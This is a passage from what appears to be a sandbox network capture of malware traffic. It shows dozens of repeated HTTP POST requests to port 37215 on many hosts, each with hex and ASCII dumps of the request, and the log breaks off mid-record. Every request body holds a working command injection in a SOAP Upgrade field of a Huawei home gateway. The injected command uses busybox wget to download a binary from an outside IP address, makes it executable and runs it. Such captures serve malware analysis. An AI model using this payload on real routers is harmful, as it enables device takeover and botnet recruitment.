                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2010192.168.2.155099041.164.216.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604712963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2011192.168.2.153416641.193.68.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604749918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2012192.168.2.154952441.223.29.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604778051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2013192.168.2.153492041.0.20.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604778051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2014192.168.2.154944241.126.6.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604795933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2015192.168.2.154106841.57.104.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604856014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2016192.168.2.154207641.126.75.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604947090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2017192.168.2.154000641.197.6.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.605957985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2018192.168.2.155453041.110.66.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.605999947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2019192.168.2.155322641.126.194.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.606048107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
